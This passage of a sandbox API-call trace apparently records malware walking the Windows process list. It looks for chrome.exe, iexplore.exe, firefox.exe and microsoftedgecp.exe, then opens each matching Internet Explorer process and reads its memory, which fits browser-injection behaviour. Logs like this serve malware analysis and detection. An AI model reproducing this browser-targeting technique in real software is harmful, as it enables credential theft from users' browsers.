	[0231.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.876] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.876] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0231.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6c1c
	[0231.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.877] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0231.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.877] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.877] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0231.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.878] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0231.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6c20
	[0231.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.879] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.879] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.879] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.880] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0231.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6c24
	[0231.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.881] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0231.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.881] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.881] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0231.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.882] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0231.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0231.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0231.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6c28
	[0231.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.884] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0231.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.884] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.885] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0231.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.885] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0231.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6c2c
	[0231.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.887] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0231.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.887] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.887] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0231.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.888] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0231.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6c30
	[0231.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0231.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0231.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.890] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0231.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6c34
	[0231.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.891] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0231.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.891] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.892] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0231.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.892] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0231.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6c38
	[0231.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.893] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0231.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.894] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.894] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0231.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.895] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0231.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6c3c
	[0231.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.896] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0231.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.897] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.897] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0231.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.897] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0231.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6c40
	[0231.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.898] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0231.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.899] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.899] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0231.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.900] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0231.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6c44
	[0231.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.901] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0231.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.901] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.902] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0231.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.902] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0231.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6c48
	[0231.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.903] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0231.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.904] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.904] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0231.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.904] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0231.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6c4c
	[0231.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.905] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0231.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.906] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.906] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0231.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.906] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0231.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6c50
	[0231.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.907] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0231.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.908] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.908] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0231.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.909] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0231.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6c54
	[0231.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.910] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0231.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.935] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.936] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0231.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.936] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0231.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6c58
	[0231.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.938] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0231.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.938] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.939] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0231.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.939] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0231.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6c5c
	[0231.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.940] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0231.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.941] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.954] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0231.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.955] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0231.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6c60
	[0231.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.957] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0231.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.957] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.958] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0231.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.958] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6c64
	[0231.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.959] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.960] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.960] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.960] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.960] NtQueryInformationProcess (in: ProcessHandle=0x6c64, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.961] ReadProcessMemory (in: hProcess=0x6c64, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.961] ReadProcessMemory (in: hProcess=0x6c64, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.961] ReadProcessMemory (in: hProcess=0x6c64, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.961] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6c68
	[0231.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.963] NtQueryInformationProcess (in: ProcessHandle=0x6c68, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.963] ReadProcessMemory (in: hProcess=0x6c68, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.963] ReadProcessMemory (in: hProcess=0x6c68, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.963] ReadProcessMemory (in: hProcess=0x6c68, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.964] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6c6c
	[0231.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.965] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.965] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.965] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.966] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0231.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6c70
	[0231.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.967] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0231.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.967] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.967] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0231.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
